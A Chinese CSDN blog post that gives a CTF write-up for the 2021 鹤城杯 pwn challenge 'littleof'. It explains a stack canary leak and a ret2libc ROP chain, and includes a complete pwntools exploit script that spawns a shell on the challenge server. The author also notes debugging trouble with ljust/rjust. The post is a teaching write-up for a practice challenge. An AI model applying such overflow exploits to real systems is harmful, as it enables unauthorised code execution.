【PWN · ret2libc | Canary】[2021 鹤城杯]littleof

最新推荐文章于 2024-06-15 17:21:44 发布
最新推荐文章于 2024-06-15 17:21:44 发布
阅读量855 收藏 4
点赞数 2
分类专栏: 【PWN · Stack】 文章标签: pwn ctf ret2libc Canary
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/131098575
版权

最近比较忙,这道题用了好长时间来debug,甚至贡献了第一次在csdn上提问。。。

目录

前言

一、题目重述&思路分析

二、exp 

三、Canary

四、萌新遇到的困难 

总结

前言

Canary作为经典且基本的栈保护措施,在后期的题目中必然是基本标配。作为新手小白,最初这几次接触有点难受,but多做总结嘛。——ret2libc也依旧不熟练,做总结也是意料之中的事情。

一、题目重述&思路分析

典型存在栈溢出,程序开启了Canary保护。

程序有两次输入,都存在栈溢出。

printf有点格式化字符串漏洞的意思在里面,主要关心的就是%s打印data(地址)存储的值。在这里呢,就是把buf数组——更确切地说是buf首地址开始的字符串进行打印——如果我们写大量的数据覆写掉buf数组长度的字符串的结尾标志,那么下一行printf就可以泄露大量的栈上信息——泄露出我们的Canary

然后我们就可以通过第二个进行泄露libc,再劫持程序控制流到main,为再次进行栈溢出做准备。

主要的exp就作注释写在下方了。 

二、exp 

from pwn import *
from pwn import u64,p64

# io=process("./littleof")
io=remote("node4.anna.nssctf.cn",28750)
elf=ELF("./littleof")

context(arch="amd64",os='linux',log_level='debug')

#payload1:准备泄露canary
payload1=b'a'*(0x50-0x9)+b'b'   #构造尾部不同的垃圾数据,使得能够定位到最后
io.recvuntil(b'overflow?')
io.sendline(payload1);          #注意,最后发了个回车,对应\x0a需要剪掉
io.recvuntil(b'ab')             #定位到canary之前
canary=u64(io.recv(8))          #接收canary,但是勿忘回车
canary=canary-0x0a              #减去回车
print('canary:',hex(canary))

pop_rdi_ret_addr=0x400863
ret_addr=0x40059e               #ret只是为了将system抬高4字节,具体可以看我的另一篇博客
                                #https://blog.csdn.net/Mr_Fmnwon/article/details/130959123?spm=1001.2014.3001.5501
puts_plt=elf.plt['puts']
main_addr=0x400789
puts_got=elf.got["puts"]

print("puts_plt:",hex(puts_plt))
print("plt_got:",hex(puts_got))

#payload2:泄露libc
payload2=b'a'*(0x50-8)+p64(canary)+b'a'*8       #绕过canary保护的垃圾数据
payload2+=p64(pop_rdi_ret_addr)+p64(puts_got)   #pop rdi来设置puts的参数
payload2+=p64(puts_plt)                         #调用puts函数
payload2+=p64(main_addr)                        #返回有效地址且再次进行栈溢出

io.sendlineafter(b'Try harder!',payload2)
puts_addr = u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b'\x00'))    #获取puts真实地址
print("real addr:",hex(puts_addr))

from LibcSearcher import *
#--------------------------------ret2libc---------------------------#
libc=LibcSearcher("puts",puts_addr)
base=puts_addr-libc.dump('puts')
system=base+libc.dump('system')
bin_sh=base+libc.dump('str_bin_sh')
#-------------------------------------------------------------------#

#payload3:构造调用system("/bin/sh")
io.recvuntil(b'overflow?')
payload3=b'a'*(0x50-8)+p64(canary)+b'a'*8
payload3+=p64(ret_addr)
payload3+=p64(pop_rdi_ret_addr)+p64(bin_sh)
payload3+=p64(system)
payload3+=p64(main_addr)

io.sendline(payload3)
io.interactive()

三、Canary

作为萌新,也是通过许多资源才了解到一些知识,放到这里也方便读者

Canary学习(泄露Canary)_西杭的博客-CSDN博客

Canary学习(爆破Canary)_funcanary_西杭的博客-CSDN博客 

四、萌新遇到的困难 

为什么一道题熬了很久呢?因为最近换了台电脑,也在试/配环境 

因为对比其他师傅的exp,一模一样,但是他们可以跑通,我不行,而且报错。。。

无奈只好去提问

新电脑环境,python关于转义字符的报错-编程语言-CSDN问答 

报错在转义符,还以为是环境配置的原因。通过尝试运行其他师傅的代码,发现没有任何问题。然后就逐字逐句对比,发现了影响我的代码的一点差异——字符串对齐 

str.ljust(8,"\x00")
str.rjust(8,"\x00")

如果读者有兴趣找找网上其他的本题的exp,可能会发现有的人用rjust,有的人用ljust,有的人两者都用。

——左对齐,右对齐。什么时候左对齐,什么时候右对齐呢?在这一点上不确定,我想,是对获取信息的格式/长度/大小端序的相关知识并不明确。而网上的资源也太少了,或许是我没找到。如果有大佬能够讲讲,recv(num1).l/rjust(num2,"\x00")以及num1该如何选取该多好啊!

此外sendline会在结尾发送一个回车,作为萌新,勿忘!

总结

不断总结,不断求学

Mr_Fmnwon
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 7
    评论
专栏目录
ret2libc1pwn 入门题
02-11
pwn 入门题
NSSCTF [2021 鹤城]littleof
红叶的博客
03-02 656
很显然栈溢漏洞位于read函数中,buf大小为0x50,而read函数的第三参数,也就是输/写入/输的最大的字节长度为0x100,就是2个buf大小的数据。开启 Canary : RBP 位于 0x50 + 0x08,Canary位于0x50 - 0x08,Return Address位于0x50 + 0x16。因为Canary是栈中的一个随机值,我们通过printf泄露Canary,然后将其填充至它本来应该在的位置,就能通过检查。
[2021 鹤城]littleof [泄露canary,libc] 总结
qq_48466156的博客
06-15 244
[2021 鹤城]littleof [泄露canary,libc] 总结
反思:泄露canary之后一定要记得处理掉多余的东西————[2021 鹤城]littleof
m0_73858054的博客
02-28 786
这是一道libc类型的题目,应该是不难的,月余之前遇到。当时思路什么的都理清楚了,脚本也写来了,结果死活获取不到shell…最后又重写了一遍才跑成功了。今天又想起来这件事儿,重新捋了一遍。终于是让我找到了原因!现在把这个原因记录下来,惊醒自己千万要注重细节,不要再犯这种错误。
基本ROP之ret2libc3
至臻求学,胸怀云月
02-15 5031
ret2libc思路 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址。 ret2libc通常可以分为下面这几类: 程序中自身就含有system函数和"/bin/sh"字符串 程序中自身就有s...
2021鹤城pwn部分wp
eeeeeight的博客
10-09 2071
littleof 白给的ret2libc, 第一个输泄露canary, 第二个输泄露libc基址顺便控制一下返回地址再返回去输入, 之后就getshell咯(摊手) #!/usr/bin/env python #coding=utf-8 from pwn import* sh = remote("182.116.62.85", 27056) #sh = process('./littleof') elf = ELF('./littleof') libc = ELF('./libc-2.27.so')
鹤城PWN几道题的writeup
10-09 565
目录 babyof easyecho littleof onecho babyof #encoding=utf-8 from pwn import * context(os='linux',arch='amd64') fpath='/home/kali/ctf/pwn/ti/hb/babyof/babyof' r = process(fpath) #r = remote("182.116.62.85",21613) elf = ELF(fpath) libc =elf.libc poprd
ret2libc2pwn 入门题
02-11
pwn 入门题
17ret2libc1_64 pwn 入门题
02-11
pwn 入门题
16ret2libc1_32 pwn 入门题
02-11
pwn 入门题
pwn07.ret2syscall例题
11-11
ret2syscall例题
Canary保护
u014377094的博客
04-25 1153
之前做题没做过canary类型,今天补知识盲点遇到canary,恰好也写一篇吧。 学pwn时基本会遇到几种保护类型,如RELRO,PIE,NX,还有Canary,这里解释一下canary。 栈溢保护是一种缓冲区溢攻击缓解手段,当函数存在缓冲区溢攻击漏洞时,攻击者可以覆盖栈上的返回地址来让shellcode能够得到执行。当启用栈保护后,函数开始执行的时候会先往栈里插入cookie信息,当函数真正返回的时候会验证cookie信息是否合法,如果不合法就停止程序运行。攻击者在覆盖返回地址的时候往往也会将c
首届“鹤城”河南·鹤壁CTF网络安全挑战赛部分WP
七堇年的博客
12-24 2543
首届“鹤城”河南·鹤壁CTF网络安全挑战赛WP
首届"鹤城"CTF网络安全挑战赛 - 初赛writeup
渗透测试研究中心
12-22 1840
WEB1.middle_magic%0a绕过第一关最后加%23是#数组绕过第二关json 弱类型比较http://182.116.62.85:20253/?aaa=%0apass_the_level_1%23POST:admin[]=1&root_pwd[]=2&level_3={"result":0}flag{f03d41bf6c8d55f12324fd57f7a00427}2...
2021CTF鹤城挑战赛题目附件
NNanfeng
10-08 840
除了web题 所有的题目文件都在这里 链接:https://pan.baidu.com/s/1XXFSdNnlMdmlJtCMnl5dSg 提取码:nx87 –来自百度网盘超级会员V1的分享 需要的师傅请自行提取哦
littleof ——攻防世界
qq_41696518的博客
08-30 1714
littleof ——攻防世界
基于豪猪优化算法CPO-VMD实现信号去噪目标函数为包络信息熵 包络熵 排列熵 样本熵最小附matlab代码.rar
最新发布
07-19
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
高分项目-基于SpringBoot框架实现的毕业生信息招聘平台(包含全套源码 + 数据库sql + 论文).zip
07-19
【项目资源】:包含前端、后端、移动开发、操作系统、人工智能、物联网、信息化管理、数据库、硬件开发、大数据、课程资源、音视频、网站开发等各种技术项目的源码。包括STM32、ESP8266、PHP、QT、Linux、iOS、C++、Java、python、web、C#、EDA、proteus、RTOS等项目的源码。【项目质量】:所有源码都经过严格测试,可以直接运行。功能在确认正常工作后才上传。【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。【附加价值】:项目具有较高的学习借鉴价值,也可直接拿来修改复刻。对于有一定基础或热衷于研究的人来说,可以在这些基础代码上进行修改和扩展,实现其他功能。【沟通交流】:有任何使用上的问题,欢迎随时与博主沟通,博主会及时解答。鼓励下载和使用,并欢迎大家互相学习,共同进步。
Matlab实现鱼鹰优化算法OOA-CNN-LSTM-Multihead-Attention温度预测附matlab代码.rar
07-19
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是在程序中没有自带的/bin/sh字符串,所以需要通过其他方式获取执行shell命令的能力。 具体而言,攻击者会利用程序中的栈溢漏洞,将栈上的返回地址修改为在libc库中的某个函数的地址,例如puts函数。然后通过执行puts函数,将栈上保存的函数地址打印来。由于libc库中的函数地址相对位置是不变的,攻击者可以根据已知的函数地址和libc的版本来计算system函数的真实地址。然后再利用system函数执行特定的操作,比如执行shell命令。 总结来说,pwn ret2libc攻击的原理是通过栈溢漏洞修改返回地址为libc库中的一个函数地址,然后根据已知的函数地址和libc的版本计算system函数的真实地址,最终实现执行shell命令的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [pwn学习——ret2libc2](https://blog.csdn.net/MrTreebook/article/details/121595367)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *3* [pwn小白入门06--ret2libc](https://blog.csdn.net/weixin_45943522/article/details/120469196)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值